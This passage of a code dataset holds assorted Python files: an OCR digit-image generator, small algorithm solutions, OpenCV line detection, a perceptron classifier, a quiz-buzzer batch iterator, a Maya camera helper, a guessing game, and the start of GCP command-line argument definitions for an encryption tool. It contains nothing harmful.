size=20)\n\tplt.show()\n\t\n\n","sub_path":"lc_extractor.py","file_name":"lc_extractor.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"293418451","text":"# input: image include some digits\n# output: digits label\nimport math\nimport os\nimport random\nimport sys\n\nimport cv2\nimport numpy\nimport numpy as np\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nOUTPUT_SHAPE = (32, 120)\nDIGITS = '0123456789'\n\nLENGTHS = [3,4,5]\n#n_len = 7\nFONT_HEIGHT = 28\nfonts = ['fonts/huawenxihei.ttf']\nbg_path = 'bgs/'\n\nbg_file_list = os.listdir(bg_path)\nbg_nums = len(bg_file_list)\n\ndef euler_to_mat(yaw, pitch, roll):\n # Rotate clockwise about the Y-axis\n c, s = math.cos(yaw), math.sin(yaw)\n M = numpy.matrix([[c, 0., s],\n [0., 1., 0.],\n [-s, 0., c]])\n\n # Rotate clockwise about the X-axis\n c, s = math.cos(pitch), math.sin(pitch)\n M = numpy.matrix([[1., 0., 0.],\n [0., c, -s],\n [0., s, c]]) * M\n\n # Rotate clockwise about the Z-axis\n c, s = math.cos(roll), math.sin(roll)\n M = numpy.matrix([[c, -s, 0.],\n [s, c, 0.],\n [0., 0., 1.]]) * M\n\n return M\n\n\ndef make_affine_transform(from_shape, to_shape,\n min_scale, max_scale,\n scale_variation=1.0,\n rotation_variation=1.0,\n translation_variation=1.0):\n out_of_bounds = False\n\n from_size = numpy.array([[from_shape[1], from_shape[0]]]).T\n to_size = numpy.array([[to_shape[1], to_shape[0]]]).T\n\n scale = random.uniform((min_scale + max_scale) * 0.5 -\n (max_scale - min_scale) * 0.5 * scale_variation,\n (min_scale + max_scale) * 0.5 +\n (max_scale - min_scale) * 0.5 * scale_variation)\n\n if scale > max_scale or scale < min_scale:\n out_of_bounds = True\n roll = 
random.uniform(-0.3, 0.3) * rotation_variation\n pitch = random.uniform(-0.2, 0.2) * rotation_variation\n yaw = random.uniform(-1.2, 1.2) * rotation_variation\n # Compute a bounding box on the skewed input image (`from_shape`).\n M = euler_to_mat(yaw, pitch, roll)[:2, :2]\n h, w = from_shape[0:2]\n corners = numpy.matrix([[-w, +w, -w, +w],\n [-h, -h, +h, +h]]) * 0.5\n skewed_size = numpy.array(numpy.max(M * corners, axis=1) -\n numpy.min(M * corners, axis=1))\n\n # Set the scale as large as possible such that the skewed and scaled shape\n # is less than or equal to the desired ratio in either dimension.\n scale *= numpy.min(to_size / skewed_size) * 1.1\n\n # Set the translation such that the skewed and scaled image falls within\n # the output shape's bounds.\n trans = (numpy.random.random((2, 1)) - 0.5) * translation_variation\n trans = ((2.0 * trans) ** 5.0) / 2.0\n if numpy.any(trans < -0.5) or numpy.any(trans > 0.5):\n out_of_bounds = True\n trans = (to_size - skewed_size * scale) * trans\n\n center_to = to_size / 2.\n center_from = from_size / 2.\n\n M = euler_to_mat(yaw, pitch, roll)[:2, :2]\n\n M *= scale\n M = numpy.hstack([M, trans + center_to - M * center_from])\n\n return M, out_of_bounds\n\n\n# -----------------generate label----------------\ndef generate_label(length):\n f = \"\"\n #length = random.choice(LENGTHS)\n\n for _ in range(length):\n f = f + random.choice(DIGITS)\n return f\n\n\n# ----------------generate bg---------------------\ndef generate_bg(bg_pic_num=bg_nums):\n while True:\n fname = \"bgs/{:08d}.png\".format(random.randint(0, bg_pic_num - 1))\n bg = cv2.imread(fname) / 255.0\n\n if (bg.shape[1] >= OUTPUT_SHAPE[1] and bg.shape[0] >= OUTPUT_SHAPE[0]):\n x = random.randint(0, bg.shape[1] - OUTPUT_SHAPE[1])\n y = random.randint(0, bg.shape[0] - OUTPUT_SHAPE[0])\n bg = bg[y:y + OUTPUT_SHAPE[0], x:x + OUTPUT_SHAPE[1]]\n break\n\n return bg\n\n\n# ---------------------make char image----------------------------\ndef make_char_ims(output_height, font):\n font_size = output_height * 1\n font = ImageFont.truetype(font, font_size)\n height = max(font.getsize(d)[1] for d in DIGITS)\n for c in DIGITS:\n width = font.getsize(c)[0]\n im = Image.new(\"RGBA\", (width, height), (255, 255, 255))\n draw = ImageDraw.Draw(im)\n draw.text((0, 0), c, (0, 0, 0), font=font)\n scale = float(output_height) / height\n im = im.resize((int(width * scale), int(output_height * scale)), Image.ANTIALIAS)\n yield c, numpy.array(im)[:, :, 0].astype(numpy.float32) / 255.\n\n\ndef get_all_font_char_ims(out_height):\n result = []\n for font in fonts:\n result.append(dict(make_char_ims(out_height, font)))\n return result\n\n\ndef generate_plate(font_height, char_ims, text_color, length):\n h_padding = 0 # random.uniform(0.2, 0.3) * font_height#(0.2,0.4)\n v_padding = h_padding # random.uniform(0.1, 0.3) * font_height\n spacing = font_height * random.uniform(0.01, 0.05)\n radius = 1 # + int(font_height * 0.1 * random.random())\n code = generate_label(length)\n text_width = sum(char_ims[c].shape[1] for c in code)\n text_width += (len(code) - 1) * spacing\n\n out_shape = (int(font_height + v_padding * 2),\n int(text_width + h_padding * 2), 3)\n\n text_mask = numpy.ones(out_shape)\n\n x = h_padding\n y = v_padding\n pos = np.zeros(shape=(len(code), 2), dtype=np.float)\n for index, c in enumerate(code):\n char_im = char_ims[c]\n # print(char_im.shape)\n ix, iy = int(x), int(y)\n text_mask[iy:iy + char_im.shape[0], ix:ix + char_im.shape[1], 0] = char_im\n text_mask[iy:iy + char_im.shape[0], ix:ix + 
char_im.shape[1], 1] = char_im\n text_mask[iy:iy + char_im.shape[0], ix:ix + char_im.shape[1], 2] = char_im\n x += char_im.shape[1] + spacing\n pos[index][0] = ix\n pos[index][1] = iy\n plate = (text_color * text_mask)\n\n return plate, code, pos\n\n\ndef generate_im(char_ims, length):\n text_color = random.uniform(0.5, 1.0)\n bg = generate_bg()\n while True:\n plate, label, pos = generate_plate(FONT_HEIGHT, char_ims, text_color, length)\n M, out_of_bounds = make_affine_transform(\n from_shape=plate.shape,\n to_shape=bg.shape,\n min_scale=0.9,\n max_scale=1.0,\n rotation_variation=0.02,\n scale_variation=1.0,\n translation_variation=0.4)\n\n mask = np.ones((plate.shape[0], plate.shape[1], 3), dtype=np.float32)\n plate = cv2.warpAffine(plate, M, (bg.shape[1], bg.shape[0]))\n mask = cv2.warpAffine(mask, M, (bg.shape[1], bg.shape[0]))\n\n out = plate * bg + text_color * bg * (1 - mask)\n out = cv2.resize(out, (OUTPUT_SHAPE[1], OUTPUT_SHAPE[0]))\n out = numpy.clip(out, 0., 1.)\n\n if M[0, 2] > 0:\n break\n return out, label\n\n\ndef name_training_data_generator(batch_size=32):\n a = get_all_font_char_ims(31)\n # print(type(a[0]))\n XX = np.zeros((batch_size, OUTPUT_SHAPE[0], OUTPUT_SHAPE[1], 1), dtype=np.float32)\n # print(OUTPUT_SHAPE[0])\n # YY = np.zeros((batch_size, OUTPUT_SHAPE[1]), dtype=np.float32)\n\n label_length = np.ones(batch_size)\n # print(Y)\n label_len = np.zeros(batch_size, dtype=np.int64)\n while True:\n length = random.choice(LENGTHS)\n n_len = length+2\n Y = np.ones((batch_size, n_len), dtype=np.float32) * -2\n YY = np.ones((batch_size, n_len), dtype=np.float32) * -2\n for i in range(batch_size):\n img, label = generate_im(a[0], length)\n label_length[i] = len(label)\n\n blur_rand = random.randint(0, 4)\n kernel_size = random.randint(0, 2) * 2 + 1\n\n if blur_rand != 0:\n img = img * 255.0\n img = img.astype(np.uint8)\n img = cv2.medianBlur(img, kernel_size)\n img = img / 255.0\n blur_rand = random.randint(0, 4)\n kernel_size = random.randint(0, 2) * 2 + 1\n sigma = random.randint(0, 3)\n if blur_rand != 0:\n img = cv2.GaussianBlur(img, (kernel_size, kernel_size), sigma)\n\n img_gray = 0.11*img[:,:,0] + 0.59*img[:,:,1] + 0.3*img[:,:,2]\n img_gray = img_gray[..., np.newaxis]\n XX[i] = img_gray\n for index, code in enumerate(label):\n Y[i][0] = -3\n Y[i][index+1] = DIGITS.find(code)\n YY[i][index] = DIGITS.find(code)\n yield {'input': XX, 'train_output': Y+3, 'target_output': YY+3, 'train_length': [n_len]*batch_size}\n\n\nif __name__ == '__main__':\n batch_size = 2\n r = next(name_training_data_generator(batch_size))\n for i in range(batch_size):\n cv2.imwrite(str(i)+'.jpg', 255*r['input'][i])\n print(r['train_output'][i])\n print(r['target_output'][i])\n\n","sub_path":"data_generator_att.py","file_name":"data_generator_att.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"576605091","text":"'''\nSolution\ndp[i] = the maximum subarray sum ending at index i\n'''\nimport sys\ninput = sys.stdin.readline\n\ndef maximum_subarray(N:int,arr:list):\n dp = [0]*(N)\n dp[0] = arr[0]\n for i in range(1,N):\n dp[i] = max(dp[i-1]+arr[i],arr[i])\n print(\"dp :\",dp)\n return max(dp)\n\nT = int(input())\nfor _ in range(T):\n N = int(input())\n arr = list(map(int,input().split()))\n \n print(maximum_subarray(N,arr))\n","sub_path":"백준/Python/카테고리/구간합/10211(Maximum 
Subarray).py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"638322888","text":"import cv2\nimport numpy as np\nimport time\n'''\nOverall strategy for building trajectory:\n1. analyze the image looking for first instance of correctly colored\n pixel and stores col location in array\n2. averages col location for top half and bottom half of array\n3. uses averages as points to create a line\n\nKNOWN ISSUES:\n1. If a color pixel is not in a row i.e. line only present in half the photo\nthe average values are thwon off.\n2. Glare from lights changes the color of the image line causing for\nbad data\n\nTO fix: Find a way to only include \"good\" data points in average\ncalculations\nONCE FIEXED: a trajectory for the cart to follow can be calculated\n\nSUGGESTIONS: change array to be a list to implement a stack, push on stack\ngood data points and pop from stack for calculating average points\n'''\n\ncap = cv2.VideoCapture(0) #starts feed of camera\n#important code will error out if no camera is connected to rpi\n\ncap.set(3, 200) #initialize values for camera\n\nwhile(True):\n ret, img = cap.read() #get image frame from camera\n \n points = [0 for row in range(img.shape[0]/2)]\n #initialize array of zeros with size of half the hieght of image\n \n count = 0 #count number of points that match color of line in a row\n \n \n for i in range(0,img.shape[0],2): #itterate through every other row of pixels\n for j in range(0,img.shape[1],2): #itterate thourhg every other column in row\n if(abs(img[i][j][0] - 175)< 30 and abs(img[i][j][1] - 100)< 30 and abs(img[i][j][2] - 100)< 30):\n #^compares pixel values to see if it is close to line color\n \n img[i][j] = [0,0,0] #colors pixel black for visual purposes\n points[i/2] = j #stores col number\n count = count + 1 #adds one to count\n break #stops itteration of that row\n \n #color of current line (175, 100, 100)\n \n #calculating average values\n top_avg = 0; #average column value for top half of line\n bot_avg = 0; #average column value for bottom half of line\n for i in range(0,img.shape[0]/4): #itterate through list of stored col\n top_avg = top_avg + points[i] #sum all values in first half of points\n bot_avg = bot_avg + points[i+img.shape[0]/4] #sum of all values of second half of poitns\n top_avg = top_avg / (img.shape[0]/4) #average top values\n bot_avg = bot_avg / (img.shape[0]/4) #average bottom values \n cv2.line(img,(top_avg,img.shape[0]/6),(bot_avg,5*img.shape[0]/6),(0,0,255),5)\n #^draws line on image\n cv2.imshow('frame',img) #displays image\n \n if cv2.waitKey(1) & 0xFF == ord('q'): #if q on keyboard is pressed stop execution\n break\ncv2.destroyAllWindows() #closes opened window","sub_path":"line_detect.py","file_name":"line_detect.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"370361231","text":"import time\nfrom datetime import date, datetime, timedelta\nimport pytz\n\n# aDate = datetime(2020, 10, 18)\n# bDate = datetime.now()\n# delta = bDate - aDate\n\n# new_date = datetime(2020, 10, 18, bDate.hour, bDate.minute, bDate.second) + timedelta(days=delta.days*3) + (timedelta(days=(bDate.hour//8-2)))\n# print(bDate.hour//8)\n# print(new_date)\n\ndef suffix(d):\n return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')\n\nmonths = [\n \"Hammer\",\n \"Alturiak\",\n \"Ches\",\n \"Tarsakh\",\n \"Mirtul\",\n \"Kythorn\",\n 
\"Flamerule\",\n \"Eleasis\",\n \"Eleint\",\n \"Marpenoth\",\n \"Uktar\",\n \"Nightal\"]\n \naDate = datetime(2020, 10, 18, tzinfo=pytz.timezone('UTC'))\nbDate = datetime.now(pytz.timezone('UTC'))\ndelta = bDate - aDate\n\ngametime = datetime(2020, 10, 18, bDate.hour, bDate.minute, bDate.second) + timedelta(days=delta.days*3) + (timedelta(days=(bDate.hour//8-2)))\n\nif gametime.hour == 0:\n gametime_hour = 12\n time_decor = \"AM\"\nelse:\n gametime_hour = gametime.hour-12 if gametime.hour > 12 else gametime.hour\n time_decor = \"PM\" if gametime.hour > 12 else \"AM\"\ngametime_minute = \"0{}\".format(gametime.minute) if gametime.minute < 10 else gametime.minute\n\nprint(\"{}:{} {} UTC | {}{} of {}\".format(gametime_hour, gametime_minute, time_decor, gametime.day, suffix(gametime.day), months[gametime.month-1]))","sub_path":"Cogs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"580740249","text":"#_*_ coding: utf_8 _*_\n\nclass Settings(object):\n \"\"\"存储游戏基本设置\"\"\"\n def __init__(self):\n #飞船移动标志\n self.ship_move_up = False\n self.ship_move_down = False\n\n #飞船移动速度\n self.ship_speed = 1\n\n #方块移动方向标记\n self.dia_direction_sign = -1\n \n\n\n","sub_path":"练习/shoot_game/all_settings.py","file_name":"all_settings.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"349169295","text":"# coding=utf-8\n__author__ = 'J Tas'\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\n# =====================================================================\n\n\nclass Perceptron(object):\n \"\"\"\n This class implements an algorithm (based on perceptron learning rule)\n for supervised learning of binary classifiers.\n \"\"\"\n\n def __init__(self, eta=0.01, n=15):\n self.eta = eta\n self.n = n\n self.w = []\n self.error = []\n\n def train(self, xlist, ylist):\n \"\"\"\n :type xlist: list of lists (i.e 2D list)\n :type ylist: list\n \"\"\"\n self.w = [0] * len(xlist[0]) # init. 
weights\n for k in range(self.n):\n cnt = 0\n for x, y in zip(xlist, ylist):\n delta = y - self.predict(x) # misclassification: != 0\n if delta != 0:\n cnt += 1\n for i, xi in enumerate(x):\n self.w[i] += self.eta * delta * xi\n self.error.append(cnt)\n\n def predict(self, x):\n return 0 if np.dot(self.w, x) < 0.0 else 1\n\n def plot_classification_error(self):\n plt.plot(range(1, len(self.error) + 1), self.error, marker='o')\n plt.xlabel('Iterations')\n plt.ylabel('Missclassifications')\n plt.show()\n\n\nclass Adaline(object):\n \"\"\"\n This class implements an algorithm (based on adaline learning rule)\n for supervised learning of binary classifiers.\n \"\"\"\n\n def __init__(self, eta=0.01, n=15):\n self.eta = eta\n self.n = n\n\n def train(self, xlist, ylist):\n \"\"\"\n :type xlist: list of lists (i.e 2D list)\n :type ylist: list\n \"\"\"\n x = np.asarray(xlist)\n y = np.asarray(ylist)\n self.w = np.zeros(x.shape[1])\n for k in range(self.n):\n delta = y - self.predict(x) # calculate delta\n print(np.sum(delta))\n self.w += self.eta * x.T.dot(delta)\n\n def predict(self, x):\n return np.where(np.dot(self.w, x.T) < 0.0, 0, 1)\n\n\n# =====================================================================\n\n\ndef load():\n link = 'https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'\n df = pd.read_csv(link, header=None)\n y = df.iloc[:, 4].values\n y = np.where(y == 'Iris-setosa', 0, 1)\n x = df.iloc[:, [0, 1, 2, 3]].values\n return (x - x.mean(axis=0) / x.std(axis=0)), y\n\n\ndef main():\n x, y = load()\n p = Perceptron()\n p.train(x, y)\n p.plot_classification_error()\n print(p.w)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/Numerical Scripts/neuron.py","file_name":"neuron.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"462919909","text":"import random\nimport numpy as np\nfrom collections import defaultdict, namedtuple\nfrom typing import List, Dict, Tuple, Optional\nfrom qanta.config import conf\nfrom qanta.buzzer.util import GUESSERS\n\nBatch = namedtuple('Batch', ['qids', 'answers', 'mask', 'vecs', 'results'])\n\nN_GUESSERS = len(GUESSERS)\nN_GUESSES = conf['buzzer']['n_guesses']\n\nclass QuestionIterator(object):\n '''Each batch contains:\n qids: list, (batch_size,)\n answers: list, (batch_size,)\n mask: list, (length, batch_size,)\n vecs: xp.float32, (length, batch_size, 4 * NUM_GUESSES)\n results: xp.int32, (length, batch_size)\n '''\n\n def __init__(self, dataset: list, option2id: Dict[str, int], batch_size:int,\n bucket_size=4, step_size=1, neg_weight=1, shuffle=True,\n only_hopeful=False):\n self.dataset = dataset\n self.option2id = option2id\n self.batch_size = batch_size\n self.bucket_size = bucket_size\n self.step_size = step_size\n self.neg_weight = neg_weight\n self.shuffle = shuffle\n self.only_hopeful = only_hopeful\n self.epoch = 0\n self.iteration = 0\n self.batch_index = 0\n self.is_end_epoch = False\n self.create_batches()\n\n def dense_vector(self, dicts: List[List[Dict[str, float]]],\n wordvecs: List[List[np.ndarray]], step_size=1) -> List[List[float]]:\n '''Generate dense vectors from a sequence of guess dictionaries.\n dicts: a sequence of guess dictionaries for each guesser\n '''\n length = len(dicts)\n prev_vecs = [[0. 
for _ in range(N_GUESSERS * N_GUESSES)] \\\n for i in range(step_size)]\n vecs = []\n for i in range(length):\n if len(dicts[i]) != N_GUESSERS:\n raise ValueError(\"Inconsistent number of guessers ({0}, {1}).\".format(\n N_GUESSERS, len(dicts)))\n vec = []\n diff_vec = []\n isnew_vec = []\n word_vec = []\n for j in range(N_GUESSERS):\n dic = sorted(dicts[i][j].items(), key=lambda x: x[1], reverse=True)\n for guess, score in dic:\n vec.append(score)\n if i > 0 and guess in dicts[i-1][j]:\n diff_vec.append(score - dicts[i-1][j][guess])\n isnew_vec.append(0)\n else:\n diff_vec.append(score) \n isnew_vec.append(1)\n if len(dic) < N_GUESSES:\n for k in range(max(N_GUESSES - len(dic), 0)):\n vec.append(0)\n diff_vec.append(0)\n isnew_vec.append(0)\n if wordvecs is not None:\n word_vec += wordvecs[i][j].tolist()\n vecs.append(vec + diff_vec + isnew_vec + word_vec)\n for j in range(1, step_size + 1):\n vecs[-1] += prev_vecs[-j]\n prev_vecs.append(vec)\n if step_size > 0:\n prev_vecs = prev_vecs[-step_size:]\n return vecs\n\n def create_batches(self):\n bucket_size = self.bucket_size\n self.batches = []\n buckets = defaultdict(list)\n for example in self.dataset:\n # pad the sequence of predictions\n qid, answer, dicts, results, wordvecs = example\n \n results = np.asarray(results, dtype=np.int32)\n length, n_guessers = results.shape\n\n if n_guessers != N_GUESSERS:\n raise ValueError(\n \"Inconsistent number of guessers ({0}, {1}.\".format(\n N_GUESSERS, len(n_guessers)))\n\n # hopeful means any guesser guesses correct any time step\n hopeful = np.any(results == 1)\n if self.only_hopeful and not hopeful:\n continue\n\n # append the not buzzing action to each time step\n # not buzzing = 1 when no guesser is correct\n new_results = []\n for i in range(length):\n not_buzz = int(not any(results[i] == 1)) * self.neg_weight\n new_results.append(np.append(results[i], not_buzz))\n results = np.asarray(new_results, dtype=np.int32)\n\n if len(dicts) != length:\n raise ValueError(\"Inconsistant shape of results and vecs.\")\n vecs = self.dense_vector(dicts, wordvecs, self.step_size)\n vecs = np.asarray(vecs, dtype=np.float32)\n assert length == vecs.shape[0]\n self.n_input = len(vecs[0])\n\n padded_length = -((-length) // bucket_size) * bucket_size\n vecs_padded = np.zeros((padded_length, self.n_input))\n vecs_padded[:length,:self.n_input] = vecs\n\n results_padded = np.zeros((padded_length, (N_GUESSERS + 1)))\n results_padded[:length, :(N_GUESSERS + 1)] = results\n\n mask = [1 for _ in range(length)] + \\\n [0 for _ in range(padded_length - length)]\n\n buckets[padded_length].append((qid, answer, mask, vecs_padded,\n results_padded))\n\n for examples in buckets.values():\n for i in range(0, len(examples), self.batch_size):\n qids, answers, mask, vecs, results = \\\n zip(*examples[i : i + self.batch_size])\n batch = Batch(qids, answers, mask, vecs, results)\n self.batches.append(batch)\n\n @property\n def size(self):\n return len(self.batches)\n \n def finalize(self, reset=False):\n if self.shuffle:\n random.shuffle(self.batches)\n if reset:\n self.epoch = 0\n self.iteration = 0\n self.batch_index = 0\n\n def next_batch(self, xp, train=True):\n self.iteration += 1\n if self.batch_index == 0:\n self.epoch += 1\n self.is_end_epoch = (self.batch_index == self.size - 1)\n qids, answers, mask, vecs, results = self.batches[self.batch_index]\n\n vecs = xp.asarray(vecs, dtype=xp.float32).swapaxes(0, 1) # length * batch_size * dim\n results = xp.asarray(results, dtype=xp.int32).swapaxes(0, 1) # length * batch_size * 
n_guessers\n mask = xp.asarray(mask, dtype=xp.float32).T # length * batch_size\n # results = results * 2 - 1 # convert from (0, 1) to (-1, 1)\n\n self.batch_index = (self.batch_index + 1) % self.size\n batch = Batch(qids, answers, mask, vecs, results)\n return batch\n \n @property\n def epoch_detail(self):\n return self.iteration, self.iteration * 1.0 / self.size\n","sub_path":"qanta/buzzer/iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":6649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"435103251","text":"class DonorObject(object):\n\n def __init__(self, name, weight, gender, birth_date, last_donation, sick, uniqeid, expuniqeid, blood_type, \\\n hemoglobin, email, phone_number, suitable):\n self.name = name\n self.weight = weight\n self.gender = gender\n self.birth_date = birth_date\n self.last_donation = last_donation\n self.sick = sick\n self.uniqeid = uniqeid\n self.expuniqeid = expuniqeid\n self.blood_type = blood_type\n self.hemoglobin = hemoglobin\n self.email = email\n self.phone_number = phone_number\n self.suitable = suitable\n","sub_path":"donor_object.py","file_name":"donor_object.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"541034758","text":"# -*- encoding: utf-8 -*-\n# -*- coding: utf-8 -*-\n\n\nimport sys, os\nsys.path.append(os.path.join(os.pardir, 'util'))\n\nimport similarity\nimport json\nimport numpy\nimport matplotlib.pylab as plt\nimport math\n\ndef load_label(path):\n \"\"\" Load label-list from file.\n \"\"\"\n lbl = []\n with file(path) as opened:\n for line in opened:\n lbl.append([ int(v) for v in line.strip().split() ])\n\n return lbl\n\n\nif __name__ == '__main__':\n\n # Calculate Jaccard-coefficient for all links.\n vals = json.load(open(sys.argv[1]))\n\n vals = [ int(v) for v in vals if int(v) > 0 ]\n total = float(len(vals))\n deg = {}\n for v in vals:\n try:\n deg[v] += 1\n except KeyError:\n deg[v] = 1\n\n for v in deg.keys():\n deg[v] = float(deg[v]) / total\n\n \n \"\"\"\n range_step = 0.01\n total = float(len(vals))\n\n plots = {}\n for x in numpy.arange(1.0, step = range_step):\n plots[x] = float(len([ s for s in vals if x <= s < x + range_step ])) / total\n\n print(plots.values())\n \"\"\"\n \n #plt.plot(numpy.arange(1.0, step = range_step), plots.values())\n #plt.plot(deg.keys(), deg.values(), ',')\n plt.loglog(deg.keys(), deg.values(), ',')\n #plt.xlim(-range_step, 1.0+range_step)\n plt.savefig(sys.argv[2] + '.png')\n\n","sub_path":"stats/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"49060027","text":"import pymel.core as pm\nimport maya.cmds as cmds\n\n\"\"\"\nCamera Tools\n\n\"\"\"\nclass BasicCamera:\n \"\"\"\n Basic repetitive Camera Tasks\n\n \"\"\"\n @staticmethod\n def set_default_render_cam(name=\"RENDER_CAM\"):\n \"\"\"\n Sets the Global RenderCamera Attribute\n \"\"\"\n for cam in pm.ls(cameras=True):\n cam.renderable.set(cam.name().startswith(name))\n \n\n @staticmethod\n def create_render_cam(name=\"RENDER_CAM\"):\n \"\"\"\n Creates a camera and renames it\n\n str name: name of the camera\n bool exposure: connect a mia_exposure_photographic node to the camera\n \"\"\"\n if not pm.objExists(name):\n cam = pm.camera()[0]\n pm.rename(cam, name)\n BasicCamera.set_default_render_cam(name)\n cam = pm.PyNode(name)\n\n 
cam.getShape().setDisplayResolution(True)\n pm.lookThru(name)\n\n pm.select(cam)\n\n\nif __name__ == \"__main__\":\n BasicCamera.create_render_cam()\n","sub_path":"Scripts/Maya2018/Camera/Basic_RenderCam.py","file_name":"Basic_RenderCam.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"554146926","text":"a,b,k=map(int, input().split())\na,b=b,a\n# a:1, b:0 \n\nif k==0:\n print('Yes')\n print('1'*a+'0'*b)\n print('1'*a+'0'*b)\n exit()\n\nif a<=1 or b==0:\n print('No')\n exit()\n\n\nif a+b-1<=k:\n print('No')\n exit()\n\nzero=b-1\nxl=[0]\nyl=[1]\nfor i in range(k-1):\n if zero>0:\n xl.append(0)\n yl.append(0)\n zero-=1\n else:\n xl.append(1)\n yl.append(1)\n\nxl.append(1)\nyl.append(0)\nfor i in range(a+b-k-2):\n if zero>0:\n xl.append(0)\n yl.append(0)\n zero-=1\n else:\n xl.append(1)\n yl.append(1)\n\nxl.append(1)\nyl.append(1)\n\nxl=[str(x) for x in xl]\nyl=[str(y) for y in yl]\n\nprint('Yes')\nprint(''.join(xl[::-1]))\nprint(''.join(yl[::-1]))\n","sub_path":"2_kakomon/codeforces/1492_d.py","file_name":"1492_d.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"344842915","text":"import random\n\n\nwith open (\"score.txt\", 'r') as best_file:\n best_score = best_file.read()\n # print(len (best_score))\n # for line in best_score:\n print(\"Best Score is : \" + best_score)\n\nsecret = random.randint(1,30)\nattempts = 0\n\nwhile True:\n\n guess =int(input(\"Guess the secret number ( between 1 end 30):\"))\n\n if guess == secret :\n print(\"Congrulatations\")\n with open(\"score.txt\", 'r') as best_file:\n best_score = best_file.read()\n if int(best_score) == attempts :\n print(\"New best score\")\n\n break\n elif guess < secret:\n\n print (\"Increase value\")\n attempts = attempts + 1\n if attempts < int(best_score):\n with open(\"score.txt\", 'w') as best_file:\n best_file.write(str(attempts))\n elif guess > secret:\n print (\"Decrease Value\")\n attempts = attempts + 1\n if attempts < int(best_score):\n with open(\"score.txt\", 'w') as best_file:\n best_file.write(str(attempts))\n\n\n","sub_path":"Aula3/GuestSecret2.py","file_name":"GuestSecret2.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"302028654","text":"# Copyright 2017 Bracket Computing, Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# https://github.com/brkt/brkt-cli/blob/master/LICENSE\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and\n# limitations under the License.\nimport argparse\nfrom brkt_cli.gcp import gcp_args\n\n\ndef setup_wrap_gcp_image_args(parser, parsed_config):\n parser.add_argument(\n 'image',\n metavar='ID',\n help='The image that will be wrapped with the Bracket Metavisor',\n )\n parser.add_argument(\n '--instance-name',\n metavar='NAME',\n dest='instance_name',\n help='Name of the instance'\n )\n parser.add_argument(\n '--instance-type',\n help='Instance type',\n dest='instance_type',\n default='n1-standard-1'\n )\n gcp_args.add_gcp_zone(parser, parsed_config)\n parser.add_argument(\n '--no-delete-boot',\n help='Do not delete boot disk when instance is deleted',\n dest='delete_boot',\n default=True,\n action='store_false'\n )\n gcp_args.add_gcp_project(parser, parsed_config)\n gcp_args.add_gcp_image_project(parser)\n gcp_args.add_gcp_network(parser, parsed_config)\n parser.add_argument(\n '--gcp-tag',\n dest='gcp_tags',\n action='append',\n metavar='VALUE',\n help=(\n 'Set a GCP tag on the encrypted instance being launched. May be '\n 'specified multiple times.'\n )\n )\n gcp_args.add_gcp_encryptor_image(parser)\n gcp_args.add_gcp_encryptor_image_file(parser)\n gcp_args.add_gcp_encryptor_image_bucket(parser)\n # Optional startup script. Hidden because it is only used for development\n # and testing. It should be passed as a string containing a multi-line\n # script (bash, python etc.)\n parser.add_argument(\n '--startup-script',\n help=argparse.SUPPRESS,\n dest='startup_script',\n metavar='SCRIPT'\n )\n gcp_args.add_gcp_subnetwork(parser, parsed_config)\n parser.add_argument(\n '--guest-fqdn',\n metavar='FQDN',\n dest='guest_fqdn',\n help=argparse.SUPPRESS\n )\n gcp_args.add_no_cleanup(parser)\n # Optional (number of) SSD scratch disks because these can only be attached\n # at instance launch time, compared to the other (persistent) disks\n parser.add_argument(\n '--ssd-scratch-disks',\n metavar='N',\n type=int,\n default=0,\n dest='ssd_scratch_disks',\n help='Number of SSD scratch disks to be attached (max. 
